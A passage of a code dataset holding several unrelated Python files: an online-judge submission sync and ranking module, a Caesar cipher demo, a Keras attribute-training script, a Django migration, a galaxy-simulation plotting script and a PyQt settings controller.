== 201:\n return r.json()\n else:\n return None\n\n\n# 废弃代码\ndef submit(submission_json):\n \"\"\"\n 发起一次提交,将submission提交到Server端。该函数会返回Server端的请求回执信息。\n :param submission_json: \n :return: \n \"\"\"\n chance_left = 3\n result = None\n while result is None and chance_left > 0:\n print('submitting submission, tried %s ......' % (3 - chance_left,))\n result = request_submit(submission_json)\n chance_left -= 1\n if result is None:\n print('submitting submissio failed')\n return result\n\n\ndef request_submission_list(request_url):\n return request_data(url=request_url, auth=auth)\n\n\ndef request_submission_detail(sid):\n request_url = '%s/%s/' % (url.rstrip('/'), str(sid))\n return request_data(url=request_url, auth=auth)\n\n\ndef write_submission_compile_info(local_id, submission_json):\n info = session.query(server_models.CompileInfo).filter_by(submission_id=local_id).first()\n if info is not None:\n info.info = submission_json['compile_info']\n\n\ndef write_submission_test_data_status(local_id, submission_json):\n test_data = session.query(server_models.TestDataStatus).filter_by(submission_id=local_id).first()\n if test_data is not None:\n test_data.status = submission_json['test_data_status']\n\n\ndef write_submission_code(local_id, submission_json):\n code = session.query(server_models.SubmissionCode).filter_by(submission_id=local_id).first()\n if code is not None:\n code.code = submission_json['code']\n\n\ndef write_rank(local_submission, submission_json):\n \"\"\"\n 根据提交,将提交的信息更新到Rank上去。\n :param local_submission: \n :param submission_json: \n :return: \n \"\"\"\n if local_submission.finished is False: # 仅当提交已完成,才会做累计。\n return\n rank = session.query(server_models.Rank).filter_by(mission_id=local_submission.mission_id).first()\n mission = session.query(server_models.Mission).filter_by(id=local_submission.mission_id).first()\n\n if rank is None:\n # 创建新的model\n rank = server_models.Rank(\n mission_id=local_submission.mission_id,\n user_id=local_submission.user_id,\n organization_id=local_submission.organization_id,\n sub_count=0,\n solved=0,\n penalty=0,\n sum_score=0,\n result={}\n )\n session.add(rank)\n problem_id = local_submission.problem_id # 获得了题目的ID。\n rank.sub_count += 1\n if str(problem_id) not in rank.result: # 这个题目还没有被提交过的痕迹,那么就创建。\n rank.result[str(problem_id)] = {\n 'sub_count': 0,\n 'ac_time': None,\n 'wrong_count': 0,\n 'status': '',\n 'average_score': 0,\n 'max_score': 0,\n 'latest_score': 0\n }\n # 下面对该题目的信息进行更新\n p_result = rank.result[str(problem_id)]\n\n if p_result['ac_time'] is None: # 这表明该题目仍未AC\n if local_submission.status == 'AC': # 这次AC了\n now_time = datetime.now()\n p_result['ac_time'] = now_time\n p_result['status'] = 'AC'\n rank.solved += 1\n # 这里的罚时计算规则是每一次错误20分钟。\n this_penalty = mktime(now_time - mission.start_time) + p_result['wrong_count'] * 20 * 60\n rank.penalty += this_penalty\n else: # 这次还是没有AC……\n p_result['wrong_count'] += 1\n p_result['status'] = local_submission.status\n # 而如果该题目AC了,那么后续的提交是不会有影响的。\n now_score = local_submission.score\n old_latest_score = p_result['latest_score']\n old_max_score = p_result['max_score']\n old_average_score = p_result['average_score']\n p_result['latest_score'] = now_score\n if now_score > p_result['max_score']:\n p_result['max_score'] = now_score\n p_result['average_score'] = \\\n (p_result['average_score'] * p_result['sub_count'] + now_score) / (p_result['sub_count'] + 1)\n # 更新提交次数必须放在后面,因为前面有个平均数依赖\n p_result['sub_count'] += 1\n # 更新在总集中的sum_score\n if mission.config['type'] == 'oi':\n if mission.config['type_config']['valid_submission'] == 'latest':\n rank.sum_score += p_result['latest_score'] - old_latest_score\n elif mission.config['type_config']['valid_submission'] == 'highest':\n rank.sum_score += p_result['max_score'] - old_max_score\n rank.result = p_result\n\n\ndef write_submission(submission_json):\n submission = session.query(server_models.Submission).filter_by(sid=submission_json['id']).first()\n if submission is not None:\n print(\"Update submission %s\" % (submission_json['id'],))\n submission.time = submission_json['time']\n submission.memory = submission_json['memory']\n submission.length = submission_json['length']\n submission.status = submission_json['status']\n submission.score = submission_json['score'] if 'score' in submission_json else None\n submission.finished = submission_json['finished']\n submission.update_time = submission_json['update_time']\n # 由于查询附带信息需要本地提交的id,所以需要手动加入。\n write_submission_compile_info(submission.id, submission_json)\n write_submission_test_data_status(submission.id, submission_json)\n write_submission_code(submission.id, submission_json)\n session.commit()\n\n\ndef update_submission(sid):\n chance_left = 3\n submission_detail = None\n while submission_detail is None and chance_left > 0:\n submission_detail = request_submission_detail(sid)\n chance_left -= 1\n if submission_detail is not None:\n write_submission(submission_detail)\n\n\ndef update_submissions(update_all=False):\n time = timestamp_cur()\n request_url = url if update_all else updated_request(url, cache_name)\n while request_url is not None:\n chance_left = 3\n submission_list = None\n while submission_list is None and chance_left > 0:\n # 我觉得在请求列表的时候可以把user也作为过滤筛选项。\n submission_list = request_submission_list(request_url)\n chance_left -= 1\n if submission_list is None:\n request_url = None\n else:\n for s in submission_list['results']:\n update_submission(s['id'])\n request_url = submission_list['next']\n update_cache(cache_name, time)\n\n","sub_path":"Client/sdustoj_client/data_updater/functions/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652616319","text":"# -*- coding:utf-8 -*-\n#凯撒密码:把字母移动一定的位数\n\n\n#字符表\nmstr = 'abcdefghijklmnopqrstuvwxyz'\n#字符表长度\nlenthM = len(mstr)\n\ndef caesar(strs, shift):\n '''\n\n :param strs: 输入明文\n :param shift: 移动的位数\n :return:加密后的结果\n '''\n newstrs = ''\n for x in strs:\n #获取x字符在mstr中的位置\n numX = mstr.index(x)\n\n #更新新的位置\n numX = (numX + shift) % lenthM\n\n newstrs = newstrs + mstr[numX]\n\n return newstrs\n\nif __name__ == '__main__':\n strs = raw_input(\"Enter character sequence:\")\n shift = input(\"shift Number:\")\n C = caesar(strs, shift)\n print(\"CiperText:\", C)\n print(\"PlainText:\", caesar(C, int(shift)*(-1)))","sub_path":"classical/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478646844","text":"\"\"\"\npython train_model_attribute.py --gpus 1 --name inceptionv3 --image_size 139 --batch_size 64 --weights ../models/inceptionv3/inceptionv3_2018-08-28_baseline_model.h5\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport math\nimport random\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import Model, Sequential\nfrom keras.applications import VGG16, VGG19\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.densenet import DenseNet121\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.mobilenet import MobileNet\nfrom keras.layers import Flatten, Dense, GlobalAveragePooling2D\nfrom keras.preprocessing import image\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau, EarlyStopping, TensorBoard, CSVLogger\nfrom keras.utils import multi_gpu_model\nimport os\nimport datetime\nimport argparse\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\n\n\ndef array2dic(array, classes):\n index = 0\n dic = {}\n for m,n in classes.items():\n old_index = index\n index += n\n dic.update({m : array[:, old_index:index]})\n return dic\n\ndef generate_batch_data(X, y, batch_size, classes):\n length = len(y)\n index = [i for i in range(0, length // batch_size + 1)]\n random.shuffle(index)\n for i in range(len(index)):\n start_idx = index[i] * batch_size\n end_idx = index[i+1] * batch_size\n if end_idx >= length:\n end_idx = length\n yield X[start_idx:end_idx], array2dic(y[start_idx:end_idx], classes)\n\n\ndef parse_arg():\n parser = argparse.ArgumentParser(description='training of the baseline...')\n parser.add_argument('--gpus', type=str, default='',\n help='gpu device\\'s ID need to be used')\n parser.add_argument('--name', type=str, default='',\n help='the model has been learned, including : ' + str(model_names))\n parser.add_argument('--image_size', type=int, default=64,\n help='the image size need to input the network')\n parser.add_argument('--batch_size', type=int, default=64,\n help='the batch size need to train the model')\n parser.add_argument('--weights', type=str, default='',\n help='the weights file need to train the model')\n args = parser.parse_args()\n if args.name not in model_names:\n print(\"Try again!Input the right model name as following: \")\n print(model_names)\n exit()\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus\n return args\n\n\nmodel_names = ['inceptionv3', 'vgg19', 'mobilenet', 'densenet121', 'resnet50']\nargs = parse_arg()\ngpus_num = len(args.gpus.split(','))\n\nconfig = tf.ConfigProto() \nconfig.gpu_options.allow_growth=True #不全部占满显存, 按需分配\nsess = tf.Session(config=config)\n\nKTF.set_session(sess)\n\nmodel_dir = \"\"\nmodel_name = \"\"\nif args.name == \"inceptionv3\":\n model_dir = \"../models/inceptionv3/\"\n model_name = \"Inceptionv3a25DataB\"\nelif args.name == \"vgg19\":\n model_dir = \"../models/vgg19/\"\n model_name = \"vgg19pre_\"\nelif args.name == \"densenet121\":\n model_dir = \"../models/densenet121/\"\n model_name = \"DenseNet121\"\nelif args.name == \"mobilenet\":\n model_dir = \"../models/mobilenet/\"\n model_name = \"mobile\"\nelif args.name == \"resnet50\":\n model_dir = \"../models/resnet50/\"\n model_name = \"resnet50\"\nimage_size = args.image_size\nbatch_size = args.batch_size\nnb_epoch = 500\n\ndef schedule_decay(epoch):\n initial_lrate = 0.01\n drop = 0.5\n epochs_drop = 10.0\n lrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n return lrate\n\n\n#Define the callbacks: checkpointer, decaylr, reducelr, earlystop, csvlog\n\"\"\"\nmonitor = 'loss'\ncheckpointer = ModelCheckpoint(filepath = model_dir + model_name + '_epoch{epoch:02d}_valloss{'+ monitor + ':.2f}.hdf5',\n monitor = monitor,\n verbose=1, \n save_best_only=True, \n save_weights_only=False,\n mode='auto', \n period=1)\n \"\"\"\nmonitor = 'val_loss'\ncheckpointer = ModelCheckpoint(filepath = model_dir + model_name + '_epoch{epoch:02d}_valloss{'+ monitor + ':.2f}.hdf5',\n monitor = monitor,\n verbose=1, \n save_best_only=True, \n save_weights_only=False,\n mode='auto', \n period=25)\ndecaylr = LearningRateScheduler(schedule_decay)\nreducelr = ReduceLROnPlateau(monitor = monitor,\n factor=0.1, \n patience=4, \n verbose=0, \n mode='auto', \n epsilon=0.0001, \n cooldown=0,\n min_lr=0)\nearlystop = EarlyStopping(monitor= monitor, patience=20, verbose=1, mode='auto')\ntensorboard = TensorBoard(log_dir=model_dir + 'logs', \n histogram_freq=0, \n write_graph=True, \n write_images=False, \n embeddings_freq=0,\n embeddings_layer_names=None, \n embeddings_metadata=None)\ncsvlog = CSVLogger(model_dir + 'logs/log_attributes.csv')\n\n\n#Define the model used to trainning without top layer -> feature extracting mainly used future\n#'imagenet' -> None\nclasses = { 'animal' : 1,\n 'transportation' : 1,\n 'clothes' : 1,\n 'plant' : 1,\n 'tableware' : 1,\n 'device' : 1,\n 'other_classes' : 1,\n 'black' : 1,\n 'white' : 1,\n 'blue' : 1,\n 'brown' : 1,\n 'orange' : 1,\n 'red' : 1,\n 'green' : 1,\n 'yellow' : 1,\n 'has_feathers' : 1,\n 'has_four_legs' : 1,\n 'has_two_legs' : 1,\n 'has_two_arms' : 1,\n 'for_entertainment' : 1,\n 'for_business' : 1,\n 'for_communication' : 1,\n 'for_family' : 1,\n 'for_office_use' : 1,\n 'for_personal' : 1\n} \n\"\"\"\n 'cla' : 6+1,\n # 'clo' : 8, #暂且不用\n 'has' : 4,\n 'for' : 6\n # 'is' : 6 #暂且不用\n 'gorgeous' : 1,\n 'simple' : 1,\n 'elegant' : 1,\n 'cute' : 1,\n 'pure' : 1,\n 'naive' : 1\n\"\"\"\nif args.name == \"inceptionv3\":\n #base_model = InceptionV3(weights=None, include_top=False, pooling = 'avg')\n base_model = InceptionV3(weights=None, include_top=False, input_shape=(image_size, image_size, 3))\nelif args.name == \"vgg19\":\n #base_model = VGG19(weights=None, include_top=False, pooling = 'avg')\n base_model = VGG19(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"densenet121\":\n base_model = DenseNet121(weights=None, include_top=False, pooling = 'avg')\n #base_model = DenseNet121(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"mobilenet\":\n base_model = MobileNet(weights=None, include_top=False, pooling = 'avg')\n #base_model = MobileNet(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"resnet50\":\n base_model = ResNet50(weights=None, include_top=False, pooling = 'avg')\n #base_model = ResNet50(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\n\nx = base_model.output\nx = Flatten()(x)\n#x = GlobalAveragePooling2D()(x)\nx = Dense(1024, activation='relu', name=\"dense_feature\")(x)\n#predictions = [Dense(n, activation='softmax', name=m)(x) for m,n in classes.items()]\npredictions = [Dense(n, activation='sigmoid', name=m)(x) for m,n in classes.items()]\nmodel = Model(inputs=base_model.input, outputs= predictions)\n\nif gpus_num != 1:\n #with tf.device(\"/cpu:0\"):\n #model = Model(inputs=base_model.input, outputs= predictions)\n model = multi_gpu_model(model, gpus=gpus_num)\n#model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n\n#Loading the dataset: train_x(each row as a image array) and train_y(attributes per image)\ndata_atten = pd.read_csv(r'../test.csv')\ndata_atten = data_atten.set_index('0')\ndata_train = open(r'/home/anhaoran/data/zero-shot-tianchi/dataset_B/DatasetB_20180919/train.txt')\ndata_train = data_train.readlines()\nprint(data_train[0])\npath = r'/home/anhaoran/data/zero-shot-tianchi/dataset_B/DatasetB_20180919/train/'\nlength = len(data_train)\ntrain_x = np.zeros((length, image_size, image_size, 3))\ntrain_y = np.zeros((length, 25))\nfor i in range(length):\n m,n = data_train[i].split()\n #img = image.load_img(path + m)\n img = image.load_img(path + m, target_size=(image_size, image_size, 3))\n train_x[i] = image.img_to_array(img)\n train_y[i] = data_atten.loc[n]\n \n# Data augmentation to pre-processing\nheavy_augmentation = True\nif heavy_augmentation:\n datagen = ImageDataGenerator(\n featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range=45,\n width_shift_range=0.25,\n height_shift_range=0.25,\n horizontal_flip=True,\n vertical_flip=False,\n zoom_range=0.5,\n channel_shift_range=0.5,\n fill_mode='nearest')\nelse:\n datagen = ImageDataGenerator(\n featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range=0,\n width_shift_range=0.125,\n height_shift_range=0.125,\n horizontal_flip=True,\n vertical_flip=False,\n fill_mode='nearest')\ndatagen.fit(train_x)\n\nprint(\"The shape of the X_train is: \", train_x.shape)\nprint(\"The shape of the y_train is: \", train_y.shape)\n \n\n#Train the model\n\n#model.load_weights(model_dir + 'inceptionv3_2018-08-26_epoch50_7.30.hdf5')\n#\"\"\"\n#\"Deal with the train_y to a dictionnary\ny_train = array2dic(train_y, classes)\nif args.weights != '':\n model.load_weights(args.weights, by_name=True)\nmodel.fit(train_x, y_train,\n epochs = nb_epoch,\n batch_size = batch_size,\n validation_split = 0.3,\n callbacks = [checkpointer, csvlog])\n#\"\"\"\nX_train, X_test, y_train, y_test = train_test_split(train_x,train_y, test_size=0.3, random_state=0)\n\"\"\"\nDeal with the train_y to a dictionnary\ny_train = array2dic(y_train, classes)\ny_test = array2dic(y_test, classes)\ntrain_generator = datagen.flow(X_train, y_train, batch_size=batch_size)--->must ndarray\nval_generator = datagen.flow(X_test, y_test, batch_size=batch_size)--->must ndarray\n\nmodel.fit_generator(generate_batch_data(X_train, y_train, batch_size * gpus_num, classes),\n steps_per_epoch = int(X_train.shape[0] / (batch_size * gpus_num)),\n epochs = nb_epoch,\n validation_data = generate_batch_data(X_test, y_test, batch_size * gpus_num, classes),\n validation_steps = int(X_test.shape[0] / (batch_size * gpus_num)),\n callbacks = [checkpointer, csvlog])\n\"\"\"\nmodel.save(model_dir + model_name + '_baseline_model.h5')\nnow_time = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\nos.system('mv nohup.out ' + model_dir + 'nohup_' + now_time + '.out')\n","sub_path":"py/train_model_attribute.py","file_name":"train_model_attribute.py","file_ext":"py","file_size_in_byte":11689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"8752258","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('postproduccion', '0009_video_archivado'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Coleccion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=100, verbose_name='T\\xedtulo de Colecci\\xf3n')),\n ('autor', models.CharField(default=b'', max_length=255, verbose_name='Responsable')),\n ('email', models.EmailField(default=b'', max_length=254, verbose_name='Email del responsable')),\n ('tipoVideo', models.CharField(default=b'UNK', max_length=3, verbose_name=b'Tipo Producci\\xc3\\xb3n', choices=[(b'UNK', 'Sin definir'), (b'PIL', 'P\\xedldora formativa'), (b'VID', 'Videotutoriales'), (b'EDU', 'V\\xeddeos Educativos'), (b'EVE', 'Grabaci\\xf3n de Eventos'), (b'OTR', 'Otros')])),\n ('objecto_aprendizaje', models.BooleanField(default=True, verbose_name='Objeto de aprendizaje')),\n ('fecha', models.DateTimeField(null=True, verbose_name='Fecha de creaci\\xf3n', blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='video',\n name='coleccion',\n field=models.ForeignKey(blank=True, to='postproduccion.Coleccion', null=True),\n ),\n ]\n","sub_path":"postproduccion/migrations/0010_auto_20160520_1353.py","file_name":"0010_auto_20160520_1353.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"196276015","text":"# This script plots face-on and edge-on plots of ChaNGa Nbody\n# simulations in gas density and overplots the virial radius\n\n\n# N. Nicole Sanchez -- July 5, 2017\n# U. W. Seattle -- Nbody Shop\nimport matplotlib.pyplot as plt\n#import matplotlib.cm as cm\nimport numpy as np\nimport pynbody\nimport sys\n\nplt.rc('font', size=12, family='serif', style='normal', variant='normal', stretch='normal', weight='normal')\nplt.rc('xtick', labelsize=12)\nplt.rc('xtick.major', size=6, width=1)\nplt.rc('lines', lw=2)\nplt.rc('axes', lw=1, labelsize=12)\n\nif len(sys.argv) == 1:\n print('No galaxy selected. Current options: P0, GM1, GM4, GM5, GM6, GM7')\n print('Syntax: \"GM_xygasplots.py GM1\"')\n quit()\nelse:\n if (str(sys.argv[1]) == 'P0'):\n sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243.1536g1bwK1BH/pioneer50h243.1536gst1bwK1BH.004096')\n elif (str(sys.argv[1]) == 'GM1'):\n sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM1.1536gs1bwK1BH/pioneer50h243GM1.1536gst1bwK1BH.004096')\n elif (str(sys.argv[1]) == 'GM4'):\n sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM4.1536gst1bwK1BH/OLD/pioneer50h243GM4.1536gst1bwK1BH.004096')\n elif (str(sys.argv[1]) == 'GM5'):\n sim = pynbody.load('/nobackup/nnsanche/pioneer50h243GM5.1536gst1bwK1BH/pioneer50h243GM5.1536gst1bwK1BH.004096')\n elif (str(sys.argv[1]) == 'GM6'):\n sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM6.1536gst1bwK1BH/pioneer50h243GM6.1536gst1bwK1BH.004096')\n elif (str(sys.argv[1]) == 'GM7'):\n sim = pynbody.load('/nobackup/nnsanche/pioneer50h243GM7.1536gst1bwK1BH/pioneer50h243GM7.1536gst1bwK1BH.004096')\n\n else :\n print('Not a valid option. Current options: P0, GM1, GM4, GM5, GM6, GM7')\n print('Syntax: \"GM_xygasplots.py GM1\"')\n quit() \n\n name = str(sys.argv[1])\n print(name+' simulation at z = ','%.2f' % sim.properties['z'] )\n R_vir = np.loadtxt('../'+name+'/'+name+'_mainhalo.stat',dtype=float,skiprows=1,usecols=6,unpack=True)\n\nif (str(sys.argv[1]) == 'GM7'):\n R_vir = h1.properties['Rvir'] \n\nprint('Virial radius:',float(R_vir))\nR_vir = float(R_vir)\n\nh = sim.halos()\nh1 = h[1]\npynbody.analysis.halo.center(h1,mode='ssc')\npynbody.analysis.angmom.faceon(h1)\nsim.physical_units()\n\nm_h = 1.6733 * 10**-24 # g\nsim.g['rho_in_nhcm'] = sim.g['rho'].in_units('g cm**-3') / m_h\n\n\n# Plotting face on\npynbody.plot.sph.image(sim.g, qty='rho_in_nhcm' , width=2*270, cmap='jet', show_cbar=False, vmin=10**-6, vmax=10**1)\nfig = plt.gcf()\nax = fig.gca()\n\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='white',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'n$_H$ [cm$^{-3}$]')\nplt.text(-245,220,name, color='White')\nplt.text(185,-240,'z = 0',color='White')\n#plt.xlim(275,275)\n#plt.ylim(275,275)\nplt.savefig(name+'_gasdensity.pdf')\nplt.show()\nplt.clf()\n\nquit()\n# Plotting temperature map\npynbody.plot.sph.image(sim.g, qty='temp', width=2*R_vir, cmap='jet', show_cbar=False,vmin=10**3, vmax=10**7)\nfig = plt.gcf()\nax = fig.gca()\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='Black',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'T [K]')\nplt.text(-245,220,name, color='Black')\nplt.text(185,-240,'z = 0',color='Black')\nplt.savefig(name+'_gastemp.pdf')\nplt.show()\n\n# Plotting metal mass fraction\npynbody.plot.sph.image(sim.g, qty='metals', width=2*R_vir, cmap='jet', show_cbar=False,vmin=10**-6, vmax=5*10**-1)\nfig = plt.gcf()\nax = fig.gca()\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='Black',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'metal mass fraction')\nplt.text(-245,220,name, color='Black')\nplt.text(185,-240,'z = 0',color='Black')\nplt.savefig(name+'_gasmetalfrac.pdf')\nplt.show()\n","sub_path":"properties/H1_xygasplots.py","file_name":"H1_xygasplots.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"35384604","text":"\"\"\"This module handles all operations involving the user's settings.\"\"\"\n\nimport json\nfrom os import path\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom ui import SettingsTab\nimport ManageDB\nfrom Constants import *\nimport GeneralUtils\nfrom GeneralUtils import JsonModel\n\n\nclass Setting(Enum):\n \"\"\"An enum of all settings\"\"\"\n YEARLY_DIR = 0\n OTHER_DIR = 1\n REQUEST_INTERVAL = 2\n REQUEST_TIMEOUT = 3\n CONCURRENT_VENDORS = 4\n CONCURRENT_REPORTS = 5\n USER_AGENT = 6\n\n\nclass SettingsModel(JsonModel):\n \"\"\"This holds the user's settings.\n\n :param yearly_directory: The directory where yearly reports are saved. Yearly reports are reports that include all\n the available data for a year.\n :param other_directory: The default directory where non-yearly reports are saved.\n :param request_interval: The time to wait between each report request, per vendor.\n :param request_timeout: The time to wait before timing out a connection (seconds).\n :param concurrent_vendors: The max number of vendors to work on at a time.\n :param concurrent_reports: The max number of reports to work on at a time, per vendor.\n :param user_agent: The user-agent that's included in the header when making requests.\n \"\"\"\n def __init__(self, show_debug_messages: bool, yearly_directory: str, other_directory: str, request_interval: int,\n request_timeout: int, concurrent_vendors: int, concurrent_reports: int, user_agent: str,\n default_currency: str):\n self.show_debug_messages = show_debug_messages\n self.yearly_directory = path.abspath(yearly_directory) + path.sep\n self.other_directory = path.abspath(other_directory) + path.sep\n self.request_interval = request_interval\n self.request_timeout = request_timeout\n self.concurrent_vendors = concurrent_vendors\n self.concurrent_reports = concurrent_reports\n self.user_agent = user_agent\n self.default_currency = default_currency\n\n @classmethod\n def from_json(cls, json_dict: dict):\n show_debug_messages = json_dict[\"show_debug_messages\"]\\\n if \"show_debug_messages\" in json_dict else SHOW_DEBUG_MESSAGES\n yearly_directory = json_dict[\"yearly_directory\"]\\\n if \"yearly_directory\" in json_dict else YEARLY_DIR\n other_directory = json_dict[\"other_directory\"]\\\n if \"other_directory\" in json_dict else OTHER_DIR\n request_interval = int(json_dict[\"request_interval\"])\\\n if \"request_interval\" in json_dict else REQUEST_INTERVAL\n request_timeout = int(json_dict[\"request_timeout\"])\\\n if \"request_timeout\" in json_dict else REQUEST_TIMEOUT\n concurrent_vendors = int(json_dict[\"concurrent_vendors\"])\\\n if \"concurrent_vendors\" in json_dict else CONCURRENT_VENDORS\n concurrent_reports = int(json_dict[\"concurrent_reports\"])\\\n if \"concurrent_reports\" in json_dict else CONCURRENT_REPORTS\n user_agent = json_dict[\"user_agent\"]\\\n if \"user_agent\" in json_dict else USER_AGENT\n default_currency = json_dict[\"default_currency\"]\\\n if \"default_currency\" in json_dict else DEFAULT_CURRENCY\n\n return cls(show_debug_messages, yearly_directory, other_directory, request_interval, request_timeout,\n concurrent_vendors, concurrent_reports, user_agent, default_currency)\n\n\nclass SettingsController(QObject):\n \"\"\"Controls the Settings tab\n\n :param settings_widget: The settings widget.\n :param settings_ui: The UI for settings_widget.\n \"\"\"\n settings_changed_signal = pyqtSignal(SettingsModel)\n\n def __init__(self, settings_widget: QWidget, settings_ui: SettingsTab.Ui_settings_tab):\n # region General\n super().__init__()\n self.settings_widget = settings_widget\n\n json_string = GeneralUtils.read_json_file(SETTINGS_FILE_DIR + SETTINGS_FILE_NAME)\n json_dict = json.loads(json_string)\n self.settings = SettingsModel.from_json(json_dict)\n\n self.show_debug_checkbox = settings_ui.show_debug_check_box\n self.show_debug_checkbox.setChecked(self.settings.show_debug_messages)\n # endregion\n\n # region Reports\n self.yearly_dir_edit = settings_ui.yearly_directory_edit\n self.other_dir_edit = settings_ui.other_directory_edit\n self.request_interval_spin_box = settings_ui.request_interval_spin_box\n self.request_timeout_spin_box = settings_ui.request_timeout_spin_box\n self.concurrent_vendors_spin_box = settings_ui.concurrent_vendors_spin_box\n self.concurrent_reports_spin_box = settings_ui.concurrent_reports_spin_box\n self.user_agent_edit = settings_ui.user_agent_edit\n\n self.yearly_dir_edit.setText(self.settings.yearly_directory)\n self.other_dir_edit.setText(self.settings.other_directory)\n self.request_interval_spin_box.setValue(self.settings.request_interval)\n self.request_timeout_spin_box.setValue(self.settings.request_timeout)\n self.concurrent_vendors_spin_box.setValue(self.settings.concurrent_vendors)\n self.concurrent_reports_spin_box.setValue(self.settings.concurrent_reports)\n self.user_agent_edit.setText(self.settings.user_agent)\n\n settings_ui.yearly_directory_button.clicked.connect(\n lambda: self.on_directory_setting_clicked(Setting.YEARLY_DIR))\n settings_ui.other_directory_button.clicked.connect(\n lambda: self.on_directory_setting_clicked(Setting.OTHER_DIR))\n\n # Reports Help Messages\n settings_ui.yearly_directory_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"This is where the calendar-year reports will be saved\"))\n settings_ui.other_directory_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"This is where the special and non-calendar-year date range reports will \"\n \"be saved by default\"))\n settings_ui.request_interval_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"The number of seconds the program will wait between sending each report \"\n \"request to a given vendor\"))\n settings_ui.request_timeout_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"The number of seconds the program will allow a vendor to respond to \"\n \"each report request before canceling it\"))\n settings_ui.concurrent_vendors_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"The maximum number of vendors to work on at the same time. \"\n \"If set too high, the UI might freeze while fetching reports but the \"\n \"fetch process will continue\"))\n settings_ui.concurrent_reports_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"The maximum number of reports to work on at the same time (per vendor). \"\n \"If set too high, the UI might freeze while fetching reports but the \"\n \"fetch process will continue\"))\n settings_ui.user_agent_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"How program identifies itself to the SUSHI servers. Some vendors will \"\n \"reject some particular user agents. Only change this if there is a \"\n \"known problem as it will affect all requests to all vendors. \"\n \"See Help for more information.\"))\n settings_ui.default_currency_help_button.clicked.connect(\n lambda: GeneralUtils.show_message(\"The currency shown first in the Costs pulldown and also by Visual to \"\n \"label the local currency in the spreadsheets generated with the Cost \"\n \"Ratio option. Note: This doesn't have to be one of the pre-loaded \"\n \"currencies.\"))\n\n # endregion\n\n # region Costs\n self.default_currency_combobox = settings_ui.settings_costs_default_currency_combobox\n self.default_currency_combobox.addItems(CURRENCY_LIST)\n self.default_currency_combobox.setCurrentText(self.settings.default_currency)\n # endregion\n\n # region Search\n # set up restore database button\n self.is_rebuilding_database = False\n self.update_database_dialog = ManageDB.UpdateDatabaseProgressDialogController(self.settings_widget)\n self.rebuild_database_button = settings_ui.settings_rebuild_database_button\n self.rebuild_database_button.clicked.connect(self.on_rebuild_database_clicked)\n # endregion\n\n settings_ui.save_button.clicked.connect(self.on_save_button_clicked)\n\n def on_directory_setting_clicked(self, setting: Setting):\n \"\"\"Handles the signal emitted when a choose folder button is clicked\n\n :param setting: The setting to be changed\n \"\"\"\n dir_path = GeneralUtils.choose_directory()\n if dir_path:\n if setting == Setting.YEARLY_DIR:\n self.yearly_dir_edit.setText(dir_path)\n elif setting == Setting.OTHER_DIR:\n self.other_dir_edit.setText(dir_path)\n\n def on_save_button_clicked(self):\n \"\"\"Handles the signal emitted when the save button is clicked\"\"\"\n self.update_settings()\n self.save_settings_to_disk()\n self.settings_changed_signal.emit(self.settings)\n GeneralUtils.show_message(\"Changes saved!\")\n\n 